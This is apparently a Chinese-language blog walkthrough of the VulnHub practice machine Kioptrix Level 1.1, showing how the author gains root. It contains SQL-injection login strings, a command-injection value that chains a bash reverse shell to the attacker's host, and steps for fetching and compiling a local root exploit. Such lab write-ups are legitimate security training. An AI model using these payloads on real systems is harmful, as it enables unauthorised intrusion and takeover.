https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
目标
-得到root
*如果要下载来玩建议不要看, 因为剧透了
1. 打开你的Kali和靶机(Kioptrix: Level 1.1 (#2))
2. 使用netdiscover识别靶机.
3. 使用Zenmap扫描靶机看有什么服务端口和确定是不是靶机.
4. 打开网页有的网页看看. 有个登入界面.
5. 看一下网页码发现有一个Username是Administator. 那么可能是字典爆破可以用.
6. 那么当我测试SQL Injection的时侯就登入了.
成功登入
USERNAME : ' or 1=1 -- -
PASSWORD : ' or 1=1 -- -
成功登入
USERNAME : Administator
PASSWORD : ' or 1=1 -- -
7. 就登入进来这个界面, 那个框框显示ping一个设备. 那么就ping自己的kali机.
8. 它就会进行ping的命令, 那么这就有可能可以同时运行两个以上的命令.
(在命令结束后马上运行第二个命令可以在它们之间用;符号
9. 那么试一试看能不能成功运行. ping我们的kali机;随便一串命令.
10. 是可以运行并可以带着其他命令.
11. 那么打开netcat监听666端口.
12. 试一试看能不能反弹一个BashShell回来.
192.168.1.230;bash -i >& /dev/tcp/192.168.1.230/666 0>&1
13. 成功反弹.
14. 基本盘查.
15. 检查一下/etc文件夹下有什么信息.
16. shadow需要权限, 然后就查看了redhat-release文件
17. 得到了CentOS的版本.
18. 得到就找找看有没有漏洞, 发现有两个.
19. 我就直接拿9542.c因为它著名CentOS 4.5了.
20. 把它复制到/root目录下.
#cp /usr/share/exploitdb/exploit/linux_x86/local/9542.c /root/
21.打开查看运行条件
#cat 9542.c
发现是需要在本机运行的.
21.做一个暂时的HTTP服务在8080端口用来传输文件.
22. 进入/tmp文件夹,然后下载我们目录的9542.c
23. 因为它是.c文件所以把它编码, 再运行.
运行完成它有通知查看uid, 得到root了.
24. 再确定, 完成.
感谢阅读.
No comments:
Post a Comment